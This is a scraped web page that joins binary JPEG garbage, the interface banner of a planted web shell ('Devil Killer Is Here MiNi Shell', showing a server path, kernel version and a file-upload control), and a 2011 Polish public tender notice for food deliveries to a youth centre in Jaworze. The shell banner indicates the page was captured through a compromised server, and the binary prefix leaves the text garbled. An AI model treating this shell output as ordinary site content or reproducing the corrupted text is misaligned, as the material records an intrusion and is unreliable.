JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111201/314305-N-2011.html

<p class="kh_header"><b>Jaworze: Dostawa wraz z transportem pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj</b><br>
<b>Numer ogłoszenia: 314305 - 2011; data zamieszczenia: 01.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy , ul. Pałacowa 1, 43-384 Jaworze, woj. śląskie, tel. 0-33 8172172, faks 0-33 8172172.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> slaskie.pl/mowjaworze</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z transportem pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zaprasza do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego na wykonanie dostaw pod nazwą dostawy wraz   z transportem  pieczywa, nabiału, mięsna  i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb,  mrożonek i jaj  
Część A - pieczywo,Cześć B - nabiał,Cześć C - mięsno i przetwórstwo mięsne, Część D  - warzywa i owoce, Część E  - artykuły spożywcze,Część F -  ryby,
Część G -  mrożonki, Część H - jaja
zgodnie z wymogami określonymi   w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ. 
Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia         29 stycznia 2004r. - Prawo zamówień publicznych tekst jednolity Dz. U. z 2010 r.  Nr 113 poz. 759 z póż.zm., zwanej dalej ustawą oraz akty wykonawcze a w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny. 
III. Opis przedmiotu zamówienia 
1. Przedmiotem zamówienia jest sukcesywna dostawa wraz z transportem pieczywa w ilości   określonych poniżej 
Część A - pieczywo
Lp.    Nazwa artykułu	Jedn. miary  	ilość
1          Chleb krojony - 1 kg	szt.	5800
2	Bułka  pszenna 80 g	szt.	6000
3	Bułka graham 100g	             szt.	 2000
4	Bułka hotdog 80 G	              szt.	 3000
5	Rogal 100g	             szt.	 1600
6	Drożdżówka  z budyniem, marmoladą ,
jabłkiem i serem120g	               szt.	  1600
7	Pączek z pudrem	               szt.	  1200
8	Bułka - wek  350 g	               szt.	     10
9	Paluch drożdżowy pleciony 120 g  szt.	    200
10	Bułka tarta	           kg	    110
11	Drożdże	                        kg	       2
Część B -nabiał i przetwory mleczne 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mleko 3,2 %  1 litr karton	szt.	              3300
2	Masło 200 g  o zawartości 82 % tłuszczu szt.	3000
3	Margaryna mleczna 250 g	szt.	             800
4	Margaryna śniadaniowa 500 g	szt.	250
5	Margaryna Palma  250 g	szt.	200
6	Śmietana 18 % 400 g	szt.	380
7	Jogurt z owocami 150 g	szt.	2000
8	Kefir 200 g	szt.	150
9	Maślanka owocowa 1 l	szt.	500
10	Ser żółty twardy - Salami	kg	200
11	Ser żółty twardy  - Morski	kg	80
12	Twaróg półtłusty krajanka	kg	200
13	Twaróg cukierniczy  1 kg	szt.	20
14	Serek homogenizowany 150 g	szt.	2200
15	Serek do chleba 100 g	szt.	800
16	Serek wiejski lekki 150 g	szt.	300
17	Serek topiony z dodatkami 100 g	szt.	1700
18	Kluski na parze 200opx 6 szt. klusek	szt.	200
Część C -mięso i przetwory mięsne 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Schab zk	kg	220
2	Łopatka bk	kg	350
3	Karczek b/k	kg	80
4	Udka z kurczaka	kg	300
5	Filet z kurczaka	kg	200
6	Mięso wołowe z  grubego na pieczeń, rolady	kg	50
7	Mięso mielone wp.	kg	100
8	Wątroba wieprzowa	kg	30
9	Wątroba drobiowa	kg	40
10	Kiełbasa toruńska	kg	230
11	Kiełbasa zwyczajna	kg	150
12	Pasztetowa wieprzowa	kg	50
13	Pasztet pieczony	Kg	15
14	Polędwica drobiowa	kg	50
15	Kiełbasa kminkowa	kg	25
16	Kiełbasa szynkowa wp.	kg	30
17	Kiełbasa cienka z drobiu	Kg	50
18	Boczek wędzony bk	kg	60
19	Boczek rolowany faszerowany	kg	35
20	Kiełbasa biała	kg	130
21	Parówka śląska cienka	kg	260
22	Kiełbasa mortadela	kg	40
23	Baleron	kg	20
24	Ogonówka	kg	15
25	Szynka wieprzowa gotowana-wędzona	kg	150
26	Mielonka wieprzowa	kg	85
27	Pieczeń rzymska	kg	65
28	Słonina wędzona	kg	60
29	Kabanosy wieprzowe	kg	6
30	Krupniok  - kaszanka	kg	60
31	Porcje rosołowe	kg	400
32	Kiełbasa śląska wieprzowa	kg	150
33	Kiełbasa żywiecka	kg	80
34	Kości wołowe	kg	20
35	Boczek świeży bk	kg	20
36	Kiełbasa parówkowa gruba	kg	15
37	Żeberka wieprzowe	kg	50
38	Salceson drobiowy	kg	20
39 	Słonina świeża	Kg	10
Część D  -  Warzywa świeże   
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Burak czerwony	kg	160
2	Cebula 	kg	450
3	Ziemniak	kg	5300
4	Kapusta czerwona 	kg	100
5	Kapusta biała 	kg	380
6	Marchew	kg	230
7	Pietruszka	kg	90
8	Seler	kg	90
9	Pieczarka	kg	100
10	Por	kg	40
11	Czosnek główka	szt.	100
	Warzywa sezonowe 		
1	Ogórek zielony	kg	130
2	Pomidor	kg	180
3	Kalafior	szt.	20
4	Kalarepa	kg	15
5	Pietruszka zielona 0,25 kg	pęcz	80
6	Sałata zielona 	szt.	60
7	Koperek zielony 0,25 kg	pęcz	60
8	Szczypiorek  0,25 kg	pęcz	80
9	Cebulka zielona 0,25 kg	pęcz	65
10	Kapusta pekińska	kg	70
11	Rzodkiewka 0,25 kg	pęcz	120
12	Botwinka	kg	15
13	Papryka świeża	kg	20
14	Cukinia	kg	12
15	Fasola szparagowa	kg	15
	Warzywa kiszone		
1	Kapusta kiszona	kg	320
2	Ogórek  kiszony	kg	180
3	Żurek 0,5 l	szt.	80
	Owoce		
1	Cytryna	kg	80
2	Pomarańcze 	kg	300
3	Mandarynki	kg	130
4	Kiwi 	kg	100
5	Banany 	kg	350
6	Rabarbar	kg	15
7	Truskawka	kg	36
8	Arbuz	kg	60
9	Jabłko	kg	500
10	Śliwki	kg	100
11	Gruszka	kg	60
12	Nektarynka 	kg	40
13	Brzoskwinia	kg	40
14	Agrest	kg	12
15	Wiśnie	kg	12
16	Czereśnie	kg	20
Część E - Artykuły Spożywcze 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Cukier op.1 kg	kg	1500
2	Cukier puder	kg	55
3	Cukier waniliowy  32g	szt.	80
4	Kasza jęczmienna op.1kg	kg	70
5	Kasza manna op.1 kg	kg	30
6	Mąka wrocławska op.1 kg	kg	470
7	Mąka krupczatka op.1 kg	kg	50
8	Mąka ziemniaczana op.1 kg	kg	20
9	Ryż op. 1 kg	kg	180
10	Sól	kg	180
11	Płatki czekoladowe Nesguik 750 g	szt.	90
12	Płatki owsiane op.500g	kg	15
13	Makaron gruby 500g Lubella	szt.	450
14	Makaron nitki 250 g Czaniecki	szt.	400
15	Olej 	l	300
16	Liść laurowy    20g	szt.	30
17	Majeranek  15 g	szt.	100
18	Ziele angielskie 15 g	szt.	30
19	Papryka mielona 20 g słodka	szt.	150
20	Papryka ostra mielona 20 g	szt.	10
21	Przyprawa  do zupy typu magii 1 litr	szt.	80
22	Czosnek mielony 20 g	szt.	450
23	Pieprz mielony 20 g	szt.	440
24	Kminek 20 g	szt.	30
25	Oregano 20g	Szt.	20
26	Bazylia 20 g	Szt.	20
27	Carry 20g	Szt.	20
28	Zioła prowansalskie 20g	Szt.	30
29	Jarzynka typu Kucharek 1 kg	szt.	60
30	Proszek do pieczenia 36g	szt.	35
31	Soda oczyszczona 20 g	szt.	25
32	Kisiel owocowy 79 g	szt.	900
33	Budyń 60 g	szt.	800
34	Cynamon 20 g	szt.	30
35	Kwasek cytrynowy  20 g	szt.	15
36	Galaretka 80 g	szt.	20
37	Zupka chińska rożne smaki Vifona	szt.	1400
38	Musztarda  200g	szt.	500
39	Krem chrzanowy 170g	szt.	170
40	Majonez 900 g	szt.	150
41	Keczup 1000 g	szt.	140
42	Chrzan tarty  180 g	szt.	60
43	Ocet 500 g 10%	szt.	20
44	Herbata 100 g granulowana	szt.	450
45	Kawa zbożowa 500 g	szt.	20
46	Kakao 200 g	szt.	50
47	Dżem owocowy 1 kg	szt.	150
48	Dżem  różne smaki 280g	Szt.	360
49	Dżem  wysoko słodzony 6,5 kg	szt.	3
50	Miód naturalny  400 g	szt.	160
51	Krem czekoladowy orzechowy 360g 	szt.	500
52	Czekolada mleczna 100 g	szt.	600
53	Baton Pawełek różne smaki	szt.	300
54	Przecier pomidorowy 1 kg	szt.	115
55	Sok owocowy 1 l - karton	szt.	500
56	Syrop owocowy 6,5 kg	Szt.	5
57	Szynka drobiowa konserwa 110 g	szt.	420
58	Konserwa turystyczna 130 g	szt.	200
59	Groszek konserwowy 400g	szt.	70
60	Kukurydza konserwowa 400 g	szt.	100
61	Papryka konserwowa 900 g	szt.	170
62	Ogórek konserwowy 900 g	szt.	300
63	Koncentrat buraczany  330 ml - w butelce	szt.	40
64	Fasola  Jaś	kg	60
65	Fasola kolorowa	kg	30
66	Groch łuskany 	kg	40
67	Pasztet drobiowy 160 g	szt.	1600
68	Ananas w puszce 565 g	szt.	2
69	Brzoskwinia w puszce 850 g	szt.	6
70	Rodzynki 200g	szt.	10
71	Wiórki kokosowe 200 g	szt.	4
72	Mieszanka bakaliowa 100g
                studencka	             szt.	              8
73	Skórka pomarańczowa 100g	szt.	6
74	Ciastka  wafle różne smaki	Kg	60
75	Napoje gazowane kolorowe 1,5 l	szt.	200
76	Wody mineralne gazowane 1,5 l	szt.	200
Część F - ryby    
 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Filet z mintaja mrożony	kg	160
2	Ryba Panga mrożona	kg	50
3	Matyjas solony 1 wiaderko 4 kg	szt.	6
4	Makrela wędzona 	kg	35
5	Konserwa  rybna -filet w oleju - 170 g	szt.	400
6	Konserwa rybna - filet  w pomidorach -170g	szt.	400
7	Konserwa rybna - szproty - 170g	sz.	450
8	Konserwa -paprykarz -330g	szt.	300
9	Konserwa - tuńczyk - kawałki-170g	szt.	450
Część  G - Mrożonki warzywa, owoce, kluski, hamburgery 
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Mieszanka kompotowa	kg	300
2	Mieszanka warzywna zupa	kg	120
3	Kalafior 	kg	50
4	Brokuły	Kg	50
5	Fasola szparagowa 	kg	60
6	Pierogi ruskie z serem	kg	50
7	Pierogi z kapustą i grzybami	kg	50
8	Pierogi z mięsem	kg	80
9	Pierogi z serem	kg	50
10	Pyzy z mięsem	kg	130
11	Kluski śląskie 	kg	250
12	Kluski ze śliwkami	kg	50
13	Hamburgery drobiowe	kg	180
14	Groszek mrożony	kg	15
15	Warzywa na patelnie	kg	80
16	Truskawka	kg	100
Część  H - jaja   
L.p.     Nazwa artykułu	Jednostka miary  	Maksymalna ilość w roku
1	Jaja  Klasa XL	szt.	17000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.15.00-1, 15.51.14.00-7, 15.53.00.00-2, 15.43.11.00-8, 15.51.21.00-1, 15.11.30.00-3, 15.83.00.00-5, 15.81.10.00-9, 15.22.20.00-0, 15.33.11.70-9, 01.24.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O zamówienie mogą ubiegać się wykonawcy, którzy 
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
       jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
       a W celu potwierdzenia uprawnień Wykonawca musi prowadzić działalność 
           gospodarczą adekwatną do przedmiotu zamówienia. 
       b Stosować system HACCP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia. 
      a. Wykonali, a w przypadku świadczeń okresowych lub ciągłych również 
          wykonywanych w ciągu ostatnich 3 lat minimum 2 porównywalne dostawy, a
          jeżeli okres działalności jest krótszy, w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia. 
      a. Wykonali, a w przypadku świadczeń okresowych lub ciągłych również 
          wykonywanych w ciągu ostatnich 3 lat minimum 2 porównywalne dostawy, a
          jeżeli okres działalności jest krótszy, w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU
określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r.
- Prawo zamówień publicznych
tekst jednolity - Dz. U. z 2010 r. Nr 113, poz. 759 ze zmianami.


Przystępując do postępowania prowadzonego w trybie przetargu nieograniczonego
na Dostawa wraz z transportem: pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj
do siedziby MOW w okresie od 1 stycznia 2012 r. do 31 grudnia 2012 r.
 na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych oświadczam,  że  spełniam warunki dotyczące
1.posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają  obowiązek ich posiadania
2.posiadania  wiedzy i doświadczenia
3.dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4.sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU
określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r.
 Prawo zamówień publicznych
tekst jednolity - Dz. U. z 2010 r. Nr 113, poz. 759 ze zmianami.
Przystępując do postępowania prowadzonego w trybie przetargu nieograniczonego
na Dostawa wraz z transportem pieczywa, nabiału, mięsa i przetworów mięsnych, warzyw i owoców, artykułów spożywczych, ryb, mrożonek i jaj
do siedziby MOW w okresie od 1 stycznia 2012 r. do 31 grudnia 2012 r.
 na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych oświadczam,  że  spełniam warunki dotyczące
1.posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają  obowiązek ich posiadania
2.posiadania  wiedzy i doświadczenia
3.dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4.sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie zmiany ilości zamawianego przedmiotu zamówienia między poszczególnymi pozycjami przedmiotu zamówienia do wysokości ogólnej wartości przedmiotu zamówienia. Zmiany ilości zamawianego przedmiotu umowy mogą nastąpić w przypadku zmiany zapotrzebowania Zamawiającego w zakresie przedmiotu zamówienia. Do dokonania zmiany wymagane jest zawarcie stosownego aneksu. Ceny jednostkowe wynikające z oferty Wykonawcy mogą ulec zmianie w przypadku zmiany stawki podatku od towarów i usług obowiązującej dla produktów lub wskaźnik roczny wzrostu cen dotyczący przedmiotu zamówienia publikowany przez GUS. W przypadku zmiany stawki podatku VAT, zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
6. W przypadku spadku ceny określonego rodzaju towaru na korzyść Zamawiającego, Dostawca zobowiązuje się dostarczyć towar za niższą cenę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip slaskie.pl/mowjaworze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Młodzieżowy Ośrodek Wychowawczy w Jaworzu ul. Pałacowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: sekretariat Młodzieżowego Ośrodka Wychowawczego w Jaworzu ul. Pałacowa 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.    Nazwa artykułu	Jedn. miary  	ilość
1	Chleb krojony - 1 kg	szt.	5800
2	Bułka  pszenna 80 g	szt.	6000
3	Bułka graham 100g	szt.	2000
4	Bułka hotdog 80 G	szt.	3000
5	Rogal 100g	szt.	1600
6	Drożdżówka  z budyniem, marmoladą ,
jabłkiem i serem120g	szt.	1600
7	Pączek z pudrem	szt.	1200
8	Bułka - wek  350 g	szt.	10

9	Paluch drożdżowy pleciony 120 g	szt.	200
10	Bułka tarta	kg	110
11	Drożdże	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.15.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
